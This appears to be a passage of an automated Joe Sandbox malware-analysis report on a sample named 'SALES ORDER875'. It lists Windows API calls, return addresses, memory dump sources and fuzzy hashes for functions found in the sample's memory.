                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 847901565-0
                                                                                                                                                                                    • Opcode ID: 6e31b02b3385ef49c1e394e2fc8137fa0bfba188a9750bca2ec9e292ab6965e7
                                                                                                                                                                                    • Instruction ID: 2d1ade8e7d92481a7bbff804235af4a6644d66f6b00cdc05da73d0217bbf0246
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e31b02b3385ef49c1e394e2fc8137fa0bfba188a9750bca2ec9e292ab6965e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: E711DF71204628AFCB109F28DC04AE63BB5AF45364B118726F839CB2F0E734C991CB88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 004156BB
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 004156CD
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 004156D8
                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00415816
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                                                                    • Opcode ID: 87e9e9820896b0efba7ab1fc246737520d91f159cbcdfdaec9a2cbfa2661e0c1
                                                                                                                                                                                    • Instruction ID: b49a60004713255957ff66d312414c31b4af2457e89a8d1ef0429f49fdc731e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 87e9e9820896b0efba7ab1fc246737520d91f159cbcdfdaec9a2cbfa2661e0c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF11DF71600608DADB20EB61CC81BEF77ACEB91364B10402BF9159A181E778CAC4CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003E1A47
                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E1A59
                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E1A6F
                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003E1A8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 70868060133b3dd798de526bcfbab8f2778f5fcaa2d6335d73826fc6d89c8b9a
                                                                                                                                                                                    • Instruction ID: ed649e8b1dc6516e7c9b94cd3ef9e0e94ca6df33bf70ab95c1ab5ff98c52e4d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70868060133b3dd798de526bcfbab8f2778f5fcaa2d6335d73826fc6d89c8b9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 81113C3AD01229FFEB11DBA5CD85FADBB78EB04750F2001A1E600B7290D671AE50DB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003EE1FD
                                                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 003EE230
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003EE246
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003EE24D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                                                    • Opcode ID: 29aad2f18685754f9d71b72c7aec7f1e5e7ad274c55b68e672cffea463bd49b8
                                                                                                                                                                                    • Instruction ID: 722ede6e904aec41c235ca04cfb8c5e910ab69a74ec273479105fb615c3c7491
                                                                                                                                                                                    • Opcode Fuzzy Hash: 29aad2f18685754f9d71b72c7aec7f1e5e7ad274c55b68e672cffea463bd49b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1110876904268BBD7029FA8DC45BDE7FAC9B45311F008725F924D32D1D2B0CD0487A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,003ACFF9,00000000,00000004,00000000), ref: 003AD218
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003AD224
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 003AD22B
                                                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 003AD249
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                                                                    • Opcode ID: a2360a28cc4daaa282ea46e856503b5a9bc72172b1c5691f8f66751224c006b9
                                                                                                                                                                                    • Instruction ID: 44e450d25936ed7672f79e786c745712b996889896f31053e30b98d9d9d0cfb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2360a28cc4daaa282ea46e856503b5a9bc72172b1c5691f8f66751224c006b9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1401D6764451087BC7126BA5DC09BAE7A6DDF83330F114729F926965D0DF70C901C7A0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0038604C
                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00386060
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0038606A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                                                    • Opcode ID: 14ac503f16ffa971c56626120553c8969b47ce89a90ff83fd07e2e4cd1f07218
                                                                                                                                                                                    • Instruction ID: b83ff279015aeb4b4252a9523ef96187ff03bfb9271e88c935d933d47094e83e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ac503f16ffa971c56626120553c8969b47ce89a90ff83fd07e2e4cd1f07218
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C11ADB2105609BFEF135FA48C85FEABB6DEF083A4F014215FA1452120C732DC60DBA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 003A3B56
                                                                                                                                                                                      • Part of subcall function 003A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 003A3AD2
                                                                                                                                                                                      • Part of subcall function 003A3AA3: ___AdjustPointer.LIBCMT ref: 003A3AED
                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 003A3B6B
                                                                                                                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 003A3B7C
                                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 003A3BA4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 737400349-0
                                                                                                                                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                                                                    • Instruction ID: d4f2c860acf771559d4912b9d359e77670cc66123be6f7caed74c0eec9aff85b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23012932100148BBDF129F95DC42EEB7F6EEF8A754F054014FE485A121C776E961DBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003813C6,00000000,00000000,?,003B301A,003813C6,00000000,00000000,00000000,?,003B328B,00000006,FlsSetValue), ref: 003B30A5
                                                                                                                                                                                    • GetLastError.KERNEL32(?,003B301A,003813C6,00000000,00000000,00000000,?,003B328B,00000006,FlsSetValue,00422290,FlsSetValue,00000000,00000364,?,003B2E46), ref: 003B30B1
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003B301A,003813C6,00000000,00000000,00000000,?,003B328B,00000006,FlsSetValue,00422290,FlsSetValue,00000000), ref: 003B30BF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: 987986ef01816fadb943d42aa01b7a43d38f5c846cf030e68ad77077208e4b5a
                                                                                                                                                                                    • Instruction ID: 749aa4a7b9813a767f417544299b5cb699f13cc1421987ef8536d67d75a850dc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 987986ef01816fadb943d42aa01b7a43d38f5c846cf030e68ad77077208e4b5a
                                                                                                                                                                                    • Instruction Fuzzy Hash: D101FC36785336ABC7325B799C849E777989F05765B114630FF07D3540C721D901C6D4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 003E747F
                                                                                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003E7497
                                                                                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003E74AC
                                                                                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003E74CA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1352324309-0
                                                                                                                                                                                    • Opcode ID: 7b5e98218ce26e2a28005f0d2e5b3103aefda277cfaddafd495d9e414fb271da
                                                                                                                                                                                    • Instruction ID: 22f871ad267a45feda46f6a293a3ddfb3f98ade64ea7f5194b969bcf5b2314c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b5e98218ce26e2a28005f0d2e5b3103aefda277cfaddafd495d9e414fb271da
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4711C4B5249364AFE7218F16DD48FA27FFCEB00B00F108669A616D65D1D770E904DF90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003EACD3,?,00008000), ref: 003EB0C4
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EACD3,?,00008000), ref: 003EB0E9
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,003EACD3,?,00008000), ref: 003EB0F3
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EACD3,?,00008000), ref: 003EB126
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                    • Opcode ID: c82bc36b760c97872775f5e868e5dee662e253d0e07bc9f3d700c40e12fc32d3
                                                                                                                                                                                    • Instruction ID: c038c9ba93940a391e471b42bc24507e73c5e536610b795f35a013b3ae20b47b
                                                                                                                                                                                    • Opcode Fuzzy Hash: c82bc36b760c97872775f5e868e5dee662e253d0e07bc9f3d700c40e12fc32d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44113931C41668E7CF02AFE6E9986EFFB78FF09721F118296D981B2181CB305A509B55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003E2DC5
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 003E2DD6
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003E2DDD
                                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003E2DE4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                                                    • Opcode ID: 0c1ad7ca5c80cbc7d24b8695b0c789bc92d85a68d4827ca48ad8e46ba3dee534
                                                                                                                                                                                    • Instruction ID: 198cceb2b116b7e701a3015d2ef396892d9992669b5cfe8b5877db599fde2b13
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c1ad7ca5c80cbc7d24b8695b0c789bc92d85a68d4827ca48ad8e46ba3dee534
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03E09271581234BBD7211B739C4DFEB3E6CEF42BA1F004225F205D1080DAA0C840C6B0
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00399639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00399693
                                                                                                                                                                                      • Part of subcall function 00399639: SelectObject.GDI32(?,00000000), ref: 003996A2
                                                                                                                                                                                      • Part of subcall function 00399639: BeginPath.GDI32(?), ref: 003996B9
                                                                                                                                                                                      • Part of subcall function 00399639: SelectObject.GDI32(?,00000000), ref: 003996E2
                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00418887
                                                                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00418894
                                                                                                                                                                                    • EndPath.GDI32(?), ref: 004188A4
                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 004188B2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                                                    • Opcode ID: 7b7593a663bd3ebecfe4d33a09d8336499fae9f63ff826428946e50b1ffc6c88
                                                                                                                                                                                    • Instruction ID: 8a3f6c6e33173cf0a4f1c69ec3337ce195ec707fd7519762e889782e85209eab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b7593a663bd3ebecfe4d33a09d8336499fae9f63ff826428946e50b1ffc6c88
                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF05E36181258FADB126F94AC0AFCE3F59AF0A311F048015FA11651E2C7795551CFED
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 003998CC
                                                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 003998D6
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 003998E9
                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 003998F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4037423528-0
                                                                                                                                                                                    • Opcode ID: d865fb299c7c2688d22f929c2194d2448c64ef561c032f39e923276968db6af3
                                                                                                                                                                                    • Instruction ID: 609bcf7c912f015d0ab1914e234c6d600c16c85a1e747496e04bd2dfc23ab5e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d865fb299c7c2688d22f929c2194d2448c64ef561c032f39e923276968db6af3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E065322C4240BADB225B74BC49BE83F21AB12335F14C22AF6F5540E1C37146409F11
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 003E1634
                                                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,003E11D9), ref: 003E163B
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003E11D9), ref: 003E1648
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,003E11D9), ref: 003E164F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                                                    • Opcode ID: 821f802ac037a741820e19a9519b5d1d46dff9a3dd8de19cf6fbfb6d29eb92f0
                                                                                                                                                                                    • Instruction ID: e2f6afafb84d7265cf99a66367f8713e04980057c76eee6037d6c84390f11987
                                                                                                                                                                                    • Opcode Fuzzy Hash: 821f802ac037a741820e19a9519b5d1d46dff9a3dd8de19cf6fbfb6d29eb92f0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FE08631641221DBDB201FE19E4DBC63F7CBF44791F15C828F645C9080D6344540C798
                                                                                                                                                                                    APIs
